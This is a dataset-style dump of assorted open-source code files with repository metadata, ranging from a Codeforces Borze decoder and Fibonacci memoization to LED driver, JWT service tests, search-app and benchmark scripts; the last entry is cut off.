max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars) |
---|---|---|---|---|
Codeforces/Python/B_Borze.py
|
chetnalal/Daily-Coding-DS-ALGO-Practice
| 289 |
63922
|
<filename>Codeforces/Python/B_Borze.py<gh_stars>100-1000
# Ternary numeric notation is quite popular in Berland. To telegraph the ternary number the Borze alphabet is used. Digit 0 is transmitted as «.», 1 as «-.» and 2 as «--». You are to decode the Borze code, i.e. to find out the ternary number given its representation in Borze alphabet.
# Input
# The first line contains a number in Borze code. The length of the string is between 1 and 200 characters. It's guaranteed that the given string is a valid Borze code of some ternary number (this number can have leading zeroes).
# Output
# Output the decoded ternary number. It can have leading zeroes.
# input
# .-.--
# output
# 012
# input
# --.
# output
# 20
# input
# -..-.--
# output
# 1012
s = input()  # read the Borze-encoded string
size = len(s)  # length of the input string
i = 0  # index of the first symbol of the current codeword
j = i + 1
string = ""  # decoded ternary number
while j < len(s):  # scan while a two-symbol codeword is still possible
    if s[i] == ".":
        string += "0"
        i = j
        j = i + 1
    elif s[i] == "-" and s[j] == ".":
        string += "1"
        i = j + 1
        j = i + 1
    elif s[i] == "-" and s[j] == "-":
        string += "2"
        i = j + 1
        j = i + 1
while i < len(s):  # a trailing "." (digit 0) is decoded here
    if s[i] == ".":
        string += "0"
        i += 1
print(string)
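# A shorter alternative decoder (illustrative sketch appended here, not part of the
# original solution): the codewords "--", "-." and "." can be matched left to right
# with a single regex substitution. `decode_borze` is a hypothetical helper name.
import re

def decode_borze(code):
    return re.sub(r"--|-\.|\.",
                  lambda m: {"--": "2", "-.": "1", ".": "0"}[m.group()],
                  code)

# e.g. decode_borze(".-.--") == "012" and decode_borze("-..-.--") == "1012"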
|
attic/decorators/fibonacci.py
|
banjin/FluentPython-example
| 5,651 |
63938
|
<gh_stars>1000+
# source: http://oeis.org/A000045
fibo_seq = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610,
987, 1597, 2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025,
121393, 196418, 317811, 514229, 832040, 1346269, 2178309,
3524578, 5702887, 9227465, 14930352, 24157817, 39088169]
from functools import lru_cache
def fibonacci(n):
if n < 2:
return n
return fibonacci(n-2) + fibonacci(n-1)
@lru_cache()
def fibonacci2(n):
if n < 2:
return n
return fibonacci2(n-2) + fibonacci2(n-1)
def memoize(func):
'''simplest memoizing decorator'''
cache = {}
def memoized(*args):
if args not in cache:
cache[args] = func(*args)
return cache[args]
return memoized
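# Minimal usage sketch (not in the original file): applying memoize with decorator
# syntax at definition time has the same effect as the manual rebinding done in
# chronograph() below. `fibonacci3` is a hypothetical name.
@memoize
def fibonacci3(n):
    if n < 2:
        return n
    return fibonacci3(n - 2) + fibonacci3(n - 1)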
def test():
for i, expected in enumerate(fibo_seq[:31]):
print(i, expected)
assert fibonacci(i) == expected
def chronograph():
global fibonacci
from time import time
t0 = time()
n = 32
res = fibonacci(n)
#res = [fibonacci(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
res = fibonacci2(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
fibonacci = memoize(fibonacci)
res = fibonacci(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
if __name__=='__main__':
#test()
chronograph()
|
PythonAPI/docs/snipets/carla.World.load_map_layer.py
|
zakur0/carla
| 7,883 |
63974
|
<gh_stars>1000+
# This recipe toggles on several layers in our "_Opt" maps
# Load town one with only minimum layout (roads, sidewalks, traffic lights and traffic signs)
world = client.load_world('Town01_Opt', carla.MapLayer.NONE)
# Toggle all buildings on
world.load_map_layer(carla.MapLayer.Buildings)
# Toggle all foliage on
world.load_map_layer(carla.MapLayer.Foliage)
# Toggle all parked vehicles on
world.load_map_layer(carla.MapLayer.ParkedVehicles)
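# Illustrative addition (not in the original snippet): layers can be toggled off
# again with the complementary unload_map_layer call, assuming a CARLA release
# that exposes it alongside load_map_layer.
world.unload_map_layer(carla.MapLayer.ParkedVehicles)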
|
unsupervisedRR/utils/io.py
|
Sebastian-Jung/unsupervisedRR
| 105 |
63978
|
"""
Some useful I/O functions
"""
import os
import pickle
import shutil
# get all directories in a specific directory
def get_directories(path):
return [f for f in os.listdir(path) if os.path.isdir(os.path.join(path, f))]
# get all the files in a specific directory
# extension can be string or tuple of strings
def get_files(path, extension=None):
files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]
if extension is not None:
files = [f for f in files if f.lower().endswith(extension)]
return files
# check whether a given path exists on disk
def file_exists(path):
    return os.path.exists(path)
# make directory
def makedir(path, replace_existing=False):
if not os.path.exists(path):
os.makedirs(path)
elif replace_existing:
shutil.rmtree(path)
os.makedirs(path)
else:
print("Beware .. path {} already exists".format(path))
# extract relative path from a root-directory and an absolute path
def relative_path(root, path):
return os.path.relpath(path, root)
# save pickle
def save_pickle(path, data):
with open(path, "wb") as f:
pickle.dump(data, f)
# load pickle
def load_pickle(path):
with open(path, "rb") as f:
return pickle.load(f)
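# Illustrative usage sketch (not part of the original module); the file names
# below are hypothetical examples.
if __name__ == "__main__":
    # list python and yaml files in the current directory (extension accepts a tuple)
    print(get_files(".", extension=(".py", ".yaml")))
    # round-trip a dictionary through pickle
    save_pickle("example.pkl", {"a": 1})
    print(load_pickle("example.pkl"))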
|
facebook_business/utils/version.py
|
MyrikLD/facebook-python-business-sdk
| 576 |
64001
|
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
Gets the current Facebook Python SDK version.
"""
import os
import re
def get_version():
this_dir = os.path.dirname(__file__)
package_init_filename = os.path.join(this_dir, '../__init__.py')
version = None
with open(package_init_filename, 'r') as handle:
file_content = handle.read()
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
file_content, re.MULTILINE
).group(1)
if not version:
raise ValueError('Cannot find version information')
return version
|
auto_ts/models/ar_based/__init__.py
|
barrosm/Auto_TS
| 423 |
64031
|
from .build_arima import BuildArima
from .build_sarimax import BuildSarimax
from .build_autoarimax import BuildAutoSarimax
from .build_var import BuildVAR
|
applications/MetisApplication/tests/test_MetisApplication_mpi.py
|
clazaro/Kratos
| 778 |
64042
|
<reponame>clazaro/Kratos
# import Kratos
import KratosMultiphysics
import KratosMultiphysics.MetisApplication
if not KratosMultiphysics.IsDistributedRun():
raise Exception("This test script can only be executed in MPI!")
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import the tests or test_classes to create the suites
from test_metis_submodelpart_list import TestMetisSubModelPartList
def AssembleTestSuites():
''' Populates the test suites to run.
Populates the test suites to run. At least, it should populate the suites:
"mpi_small", "mpi_nightly" and "mpi_all"
Return
------
suites: A dictionary of suites
The set of suites with their test_cases added.
'''
suites = KratosUnittest.KratosSuites
# Create a test suite with the selected tests (Small tests):
# smallSuite will contain the following tests:
# - testSmallExample
smallMPISuite = suites['mpi_small']
smallMPISuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([TestMetisSubModelPartList]))
# Create a test suite with the selected tests
# nightSuite will contain the following tests:
# - testSmallExample
# - testNightlyFirstExample
# - testNightlySecondExample
nightMPISuite = suites['mpi_nightly']
nightMPISuite.addTests(smallMPISuite)
# Create a test suite that contains all the tests from every testCase
# in the list:
allMPISuite = suites['mpi_all']
allMPISuite.addTests(nightMPISuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
|
library/scrollphat/IS31FL3730.py
|
fejao/scroll-phat
| 115 |
64055
|
<filename>library/scrollphat/IS31FL3730.py
MODE_5X11 = 0b00000011
class I2cConstants:
def __init__(self):
self.I2C_ADDR = 0x60
self.CMD_SET_MODE = 0x00
self.CMD_SET_BRIGHTNESS = 0x19
self.MODE_5X11 = 0b00000011
class IS31FL3730:
def __init__(self, smbus, font):
self.bus = smbus
self.font = font
self.i2cConstants = I2cConstants()
self._rotate = False
self.bus = self.bus.SMBus(1)
self.buffer = [0] * 11
self.offset = 0
self.error_count = 0
self.set_mode(self.i2cConstants.MODE_5X11)
def set_rotate(self, value):
self._rotate = value
def rotate5bits(self, x):
r = 0
if x & 16:
r = r | 1
if x & 8:
r = r | 2
if x & 4:
r = r | 4
if x & 2:
r = r | 8
if x & 1:
r = r | 16
return r
def update(self):
if self.offset + 11 <= len(self.buffer):
self.window = self.buffer[self.offset:self.offset + 11]
else:
self.window = self.buffer[self.offset:]
self.window += self.buffer[:11 - len(self.window)]
if self._rotate:
self.window.reverse()
for i in range(len(self.window)):
self.window[i] = self.rotate5bits(self.window[i])
self.window.append(0xff)
try:
self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR, 0x01, self.window)
except IOError:
self.error_count += 1
if self.error_count == 10:
print("A high number of IO Errors have occurred, please check your soldering/connections.")
def set_mode(self, mode=MODE_5X11):
self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR, self.i2cConstants.CMD_SET_MODE, [self.i2cConstants.MODE_5X11])
def get_brightness(self):
if hasattr(self, 'brightness'):
return self.brightness
return -1
def set_brightness(self, brightness):
self.brightness = brightness
self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR, self.i2cConstants.CMD_SET_BRIGHTNESS, [self.brightness])
def set_col(self, x, value):
if len(self.buffer) <= x:
self.buffer += [0] * (x - len(self.buffer) + 1)
self.buffer[x] = value
def write_string(self, chars, x = 0):
for char in chars:
if ord(char) == 0x20 or ord(char) not in self.font:
self.set_col(x, 0)
x += 1
self.set_col(x, 0)
x += 1
self.set_col(x, 0)
x += 1
else:
font_char = self.font[ord(char)]
for i in range(0, len(font_char)):
self.set_col(x, font_char[i])
x += 1
self.set_col(x, 0)
x += 1 # space between chars
self.update()
# draw a graph across the screen either using
# the supplied min/max for scaling or auto
# scaling the output to the min/max values
# supplied
def graph(self, values, low=None, high=None):
values = [float(x) for x in values]
if low is None:
    low = min(values)
if high is None:
    high = max(values)
span = high - low
for col, value in enumerate(values):
value -= low
value /= span
value *= 5
if value > 5: value = 5
if value < 0: value = 0
self.set_col(col, [0,16,24,28,30,31][int(value)])
self.update()
def set_buffer(self, replacement):
self.buffer = replacement
def buffer_len(self):
return len(self.buffer)
def scroll(self, delta = 1):
self.offset += delta
self.offset %= len(self.buffer)
self.update()
def clear_buffer(self):
self.offset = 0
self.buffer = [0] * 11
def clear(self):
self.clear_buffer()
self.update()
def load_font(self, new_font):
self.font = new_font
def scroll_to(self, pos = 0):
self.offset = pos
self.offset %= len(self.buffer)
self.update()
def io_errors(self):
return self.error_count
def set_pixel(self, x,y,value):
if value:
self.buffer[x] |= (1 << y)
else:
self.buffer[x] &= ~(1 << y)
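# Illustrative sketch (not part of the driver): the scaling used by graph() above,
# reproduced without touching the I2C bus, to preview which column bitmasks a set
# of values would produce. `_preview_graph_columns` is a hypothetical helper.
def _preview_graph_columns(values, low=None, high=None):
    values = [float(v) for v in values]
    low = min(values) if low is None else low
    high = max(values) if high is None else high
    span = (high - low) or 1.0  # avoid division by zero for constant input
    bars = [0, 16, 24, 28, 30, 31]
    return [bars[int(max(0.0, min(5.0, (v - low) / span * 5)))] for v in values]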
|
server/src/shared_helpers/tests/services_tests.py
|
dashhudson/go-links
| 176 |
64076
|
import datetime
import unittest
from flask import Blueprint, request, jsonify
from freezegun import freeze_time
from mock import Mock, patch
import jwt
from requests.exceptions import HTTPError
from shared_helpers import services
from testing import TrottoTestCase, LIVE_APP_HOST
class TestFunctions(unittest.TestCase):
@patch('shared_helpers.services.get_service_config', return_value={'signing_secret': 'so_secret'})
def test__create_internal_token(self, mock_get_service_config):
now = datetime.datetime.now(datetime.timezone.utc)
with freeze_time(now):
token = services._create_internal_token('my_service', {'id': 1})
self.assertEqual({'exp': int(now.timestamp()) + 30,
'id': 1},
jwt.decode(token, 'so_secret', algorithms=['HS256']))
with freeze_time(now + datetime.timedelta(seconds=40)):
with self.assertRaises(jwt.exceptions.ExpiredSignatureError):
jwt.decode(token, 'so_secret', algorithms=['HS256'])
mock_get_service_config.assert_called_once_with('my_service')
@patch('shared_helpers.services.requests.get')
@patch('shared_helpers.services._create_internal_token', return_value='internal_token')
@patch('shared_helpers.services.get_service_config', return_value={'base_url': 'https://trot.to'})
def test_get__basic(self, mock_get_service_config, mock_create_internal_token, mock_requests_get):
mock_response = Mock()
mock_response.json.return_value = {'id': 1}
mock_requests_get.return_value = mock_response
self.assertEqual({'id': 1},
services.get('my_service', 'api/users'))
mock_get_service_config.assert_called_once_with('my_service')
mock_create_internal_token.assert_called_once_with('my_service', {'url': 'https://trot.to/api/users'})
mock_requests_get.assert_called_once_with('https://trot.to/api/users',
headers={'X-Token': 'internal_token'})
@patch('shared_helpers.services.requests.get')
@patch('shared_helpers.services._create_internal_token', return_value='internal_token')
@patch('shared_helpers.services.get_service_config', return_value={'base_url': 'https://trot.to/'})
def test_get__trailing_and_leading_slashes(self,
mock_get_service_config, mock_create_internal_token, mock_requests_get):
mock_response = Mock()
mock_response.json.return_value = {'id': 1}
mock_requests_get.return_value = mock_response
self.assertEqual({'id': 1},
services.get('my_service', '/api/users'))
mock_get_service_config.assert_called_once_with('my_service')
mock_create_internal_token.assert_called_once_with('my_service', {'url': 'https://trot.to/api/users'})
mock_requests_get.assert_called_once_with('https://trot.to/api/users',
headers={'X-Token': 'internal_token'})
@patch('shared_helpers.services.requests.get')
@patch('shared_helpers.services._create_internal_token', return_value='internal_token')
@patch('shared_helpers.services.get_service_config', return_value={'base_url': 'https://trot.to'})
def test_get__http_error(self, mock_get_service_config, mock_create_internal_token, mock_requests_get):
mock_response = Mock()
mock_response.raise_for_status.side_effect = HTTPError
mock_requests_get.return_value = mock_response
with self.assertRaises(HTTPError):
services.get('my_service', 'api/users')
mock_get_service_config.assert_called_once_with('my_service')
mock_create_internal_token.assert_called_once_with('my_service', {'url': 'https://trot.to/api/users'})
mock_requests_get.assert_called_once_with('https://trot.to/api/users',
headers={'X-Token': 'internal_token'})
def test_validate_internal_request__no_token(self):
mock_request = Mock()
mock_request.headers = {}
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('no token',
str(cm.exception))
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__invalid_signature__wrong_secret(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=30),
'url': 'https://trot.to/api/users'},
'a_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('invalid signature',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__invalid_signature__no_exp(self, mock_get_config_by_key_path):
token = jwt.encode({'url': 'https://trot.to/api/users'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('missing exp',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__expired_token(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() - datetime.timedelta(seconds=1),
'url': 'https://trot.to/api/users'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('expired',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__mismatched_url(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=30),
'url': 'https://trot.to/api/users/1'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('mismatched URL',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__valid_token(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=30),
'url': 'https://trot.to/api/users'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
self.assertEqual(True,
services.validate_internal_request(mock_request))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
routes = Blueprint('test', __name__)
@routes.route('/_/api/users', methods=['GET'])
def get_users():
services.validate_internal_request(request)
return jsonify([{'id': 1}])
class TestIntegration(TrottoTestCase):
blueprints_under_test = [routes]
start_live_app = True
live_app_config = {'sessions_secret': 'a_sessions_secret',
'signing_secret': 'so_secret',
'postgres': {'url': 'postgresql://admin:testing@/testing_trotto_core'}}
@patch('shared_helpers.config.get_config', return_value={'services': {'my_service': {'signing_secret': 'so_secret',
'base_url': LIVE_APP_HOST}}})
def test_internal_request__real_handler__valid_token(self, _):
self.assertEqual([{'id': 1}],
services.get('my_service', '/_/api/users'))
@patch('shared_helpers.config.get_config', return_value={'services': {'my_service': {'signing_secret': 'a_secret',
'base_url': LIVE_APP_HOST}}})
def test_internal_request__real_handler__invalid_token(self, _):
with self.assertRaises(HTTPError) as cm:
self.assertEqual([{'id': 1}],
services.get('my_service', '/_/api/users'))
self.assertEqual(500,
cm.exception.response.status_code)
|
wikipedia-sentences/app.py
|
nikosNalmpantis/examples
| 434 |
64085
|
<reponame>nikosNalmpantis/examples
__copyright__ = "Copyright (c) 2021 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import os
import sys
import click
import random
from jina import Flow, Document, DocumentArray
from jina.logging.predefined import default_logger as logger
MAX_DOCS = int(os.environ.get('JINA_MAX_DOCS', 10000))
def config(dataset: str):
if dataset == 'toy':
os.environ['JINA_DATA_FILE'] = os.environ.get('JINA_DATA_FILE', 'data/toy-input.txt')
elif dataset == 'full':
os.environ['JINA_DATA_FILE'] = os.environ.get('JINA_DATA_FILE', 'data/input.txt')
os.environ['JINA_PORT'] = os.environ.get('JINA_PORT', str(45678))
cur_dir = os.path.dirname(os.path.abspath(__file__))
os.environ.setdefault('JINA_WORKSPACE', os.path.join(cur_dir, 'workspace'))
os.environ.setdefault('JINA_WORKSPACE_MOUNT',
f'{os.environ.get("JINA_WORKSPACE")}:/workspace/workspace')
def print_topk(resp, sentence):
for doc in resp.data.docs:
print(f"\n\n\nTa-Dah🔮, here's what we found for: {sentence}")
for idx, match in enumerate(doc.matches):
score = match.scores['cosine'].value
print(f'> {idx:>2d}({score:.2f}). {match.text}')
def input_generator(num_docs: int, file_path: str):
with open(file_path) as file:
lines = file.readlines()
num_lines = len(lines)
random.shuffle(lines)
for i in range(min(num_docs, num_lines)):
yield Document(text=lines[i])
def index(num_docs):
flow = Flow().load_config('flows/flow.yml')
data_path = os.path.join(os.path.dirname(__file__), os.environ.get('JINA_DATA_FILE', None))
with flow:
flow.post(on='/index', inputs=input_generator(num_docs, data_path),
show_progress=True)
def query(top_k):
flow = Flow().load_config('flows/flow.yml')
with flow:
text = input('Please type a sentence: ')
doc = Document(content=text)
result = flow.post(on='/search', inputs=DocumentArray([doc]),
parameters={'top_k': top_k},
line_format='text',
return_results=True,
)
print_topk(result[0], text)
@click.command()
@click.option(
'--task',
'-t',
type=click.Choice(['index', 'query'], case_sensitive=False),
)
@click.option('--num_docs', '-n', default=MAX_DOCS)
@click.option('--top_k', '-k', default=5)
@click.option('--dataset', '-d', type=click.Choice(['toy', 'full']), default='toy')
def main(task, num_docs, top_k, dataset):
config(dataset)
if task == 'index':
if os.path.exists(os.environ.get("JINA_WORKSPACE")):
logger.error(f'\n +---------------------------------------------------------------------------------+ \
\n | 🤖🤖🤖 | \
\n | The directory {os.environ.get("JINA_WORKSPACE")} already exists. Please remove it before indexing again. | \
\n | 🤖🤖🤖 | \
\n +---------------------------------------------------------------------------------+')
sys.exit(1)
index(num_docs)
elif task == 'query':
query(top_k)
if __name__ == '__main__':
main()
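# Illustrative usage (a sketch based on the click options defined above; it assumes
# the data files under data/ shipped with the example are present):
#   python app.py -t index -d toy -n 100
#   python app.py -t query -k 5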
|
examples/table_validate.py
|
vincentchevrier/tableschema-py
| 224 |
64088
|
from tableschema import Table
# Data from WEB, schema from MEMORY
SOURCE = 'https://raw.githubusercontent.com/frictionlessdata/tableschema-py/master/data/data_infer.csv'
SCHEMA = {'fields': [{'name': 'id', 'type': 'integer'}, {'name': 'age', 'type': 'integer'}, {'name': 'name', 'type': 'string'}] }
# If schema is not passed it will be inferred
table = Table(SOURCE, schema=SCHEMA)
rows = table.iter()
while True:
try:
print(next(rows))
except StopIteration:
break
except Exception as exception:
print(exception)
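# A shorter variant (illustrative sketch; it assumes the installed tableschema
# version supports the keyed/limit arguments of Table.read):
for row in table.read(keyed=True, limit=3):
    print(row)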
|
lib/plugins/3dcart.py
|
ikstream/Zeus-Scanner
| 841 |
64160
|
import re
import lib.core.common
__product__ = "3dcart"
__description__ = (
"The 3dcart Shopping Cart Software is a complete e-commerce solution for anyone."
)
def search(html, **kwargs):
html = str(html)
headers = kwargs.get("headers", None)
plugin_detection_schema = (
re.compile(r"3dcart.stats", re.I),
re.compile(r"/3dvisit/", re.I)
)
for plugin in plugin_detection_schema:
if plugin.search(html) is not None:
return True
if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE, "")) is not None:
return True
|
pykg2vec/test/test_hp_loader.py
|
baxtree/pykg2vec
| 430 |
64171
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module is for testing unit functions of the hyperparameter loader
"""
import os
import pytest
from pykg2vec.common import KGEArgParser
from pykg2vec.common import HyperparameterLoader
def test_load_default_hyperparameter_file():
hp_loader = HyperparameterLoader(KGEArgParser().get_args([]))
hyperparams = hp_loader.load_hyperparameter("freebase15k", "analogy")
search_space = hp_loader.load_search_space("analogy")
assert hyperparams["learning_rate"] == 0.1
assert hyperparams["hidden_size"] == 200
assert str(search_space["epochs"].inputs()[1]) == "0 Literal{10}"
def test_load_custom_hyperparameter_file():
custom_hyperparamter_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom_hpf.yaml")
custom_ss_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom_ssf.yaml")
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-hpf", custom_hyperparamter_file, "-ssf", custom_ss_file]))
hyperparams = hp_loader.load_hyperparameter("freebase15k", "analogy")
search_space = hp_loader.load_search_space("analogy")
assert hyperparams["learning_rate"] == 0.01
assert hyperparams["hidden_size"] == 200
assert str(search_space["epochs"].inputs()[1]) == "0 Literal{100}"
def test_exception_on_hyperparameter_file_not_exist():
with pytest.raises(FileNotFoundError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-hpf", "not_exist_file"]))
hp_loader.load_hyperparameter("freebase15k", "analogy")
assert str(e.value) == "Cannot find configuration file not_exist_file"
def test_exception_on_search_space_file_not_exist():
with pytest.raises(FileNotFoundError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-ssf", "not_exist_file"]))
hp_loader.load_search_space("analogy")
assert str(e.value) == "Cannot find configuration file not_exist_file"
def test_exception_on_hyperparameter_file_with_wrong_extension():
custom_hyperparamter_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom.txt")
with pytest.raises(ValueError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-hpf", custom_hyperparamter_file]))
hp_loader.load_hyperparameter("freebase15k", "analogy")
assert str(e.value) == "Configuration file must have .yaml or .yml extension: %s" % custom_hyperparamter_file
def test_exception_on_search_space_file_with_wrong_extension():
custom_hyperparamter_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom.txt")
with pytest.raises(ValueError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-ssf", custom_hyperparamter_file]))
hp_loader.load_search_space("analogy")
assert str(e.value) == "Configuration file must have .yaml or .yml extension: %s" % custom_hyperparamter_file
|
src/genie/libs/parser/iosxe/tests/ShowClnsIsNeighborsDetail/cli/equal/golden_output_3_expected.py
|
balmasea/genieparser
| 204 |
64179
|
expected_output = {
"tag": {
"test": {
"system_id": {
"R2_xr": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "R1_xe.01",
"format": "Phase V",
"interface": "GigabitEthernet2.115",
"ip_address": ["10.12.115.2*"],
"ipv6_address": ["FE80::F816:3EFF:FE67:2452"],
"nsf": "capable",
"priority": 64,
"state": "up",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
"R3_nx": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "R1_xe.02",
"format": "Phase V",
"interface": "GigabitEthernet3.115",
"ip_address": ["10.13.115.3*"],
"ipv6_address": ["FE80::5C01:FF:FE02:7"],
"nsf": "capable",
"priority": 64,
"state": "up",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
}
},
"test1": {
"system_id": {
"2222.22ff.4444": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "2222.22ff.4444.01",
"format": "Phase V",
"interface": "GigabitEthernet2.415",
"ip_address": ["10.12.115.2*"],
"ipv6_address": ["FE80::F816:3EFF:FE67:2452"],
"nsf": "capable",
"priority": 128,
"state": "init",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
"R3_nx": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "R1_xe.02",
"format": "Phase V",
"interface": "GigabitEthernet3.415",
"ip_address": ["10.13.115.3*"],
"ipv6_address": ["FE80::5C01:FF:FE02:7"],
"nsf": "capable",
"priority": 64,
"state": "up",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
}
},
}
}
|
benchmarks/test_headless_time.py
|
TheRakeshPurohit/wasmer-python
| 900 |
64185
|
from wasmer import engine, Store, Module, Instance
from wasmer_compiler_cranelift import Compiler as Cranelift
from wasmer_compiler_llvm import Compiler as LLVM
from wasmer_compiler_singlepass import Compiler as Singlepass
TEST_BYTES = open('benchmarks/nbody.wasm', 'rb').read()
def test_benchmark_headless_time_nbody_cranelift_jit(benchmark):
store = Store(engine.JIT(Cranelift))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_cranelift_native(benchmark):
store = Store(engine.Native(Cranelift))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_llvm_jit(benchmark):
store = Store(engine.JIT(LLVM))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_llvm_native(benchmark):
store = Store(engine.Native(LLVM))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_singlepass_jit(benchmark):
store = Store(engine.JIT(Singlepass))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_singlepass_native(benchmark):
store = Store(engine.Native(Singlepass))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
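# Illustrative sketch (not one of the benchmarks): the same headless pattern can
# persist the precompiled module to disk and reload it later, using only the
# serialize/deserialize calls exercised above. The file name is hypothetical.
def example_persist_and_reload(path='nbody.serialized'):
    store = Store(engine.JIT(Cranelift))
    with open(path, 'wb') as f:
        f.write(Module(store, TEST_BYTES).serialize())
    with open(path, 'rb') as f:
        return Instance(Module.deserialize(store, f.read()))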
|
tests/data/cli_args.py
|
festeh/docker-pretty-ps
| 241 |
64189
|
<filename>tests/data/cli_args.py
class CliArgs(object):
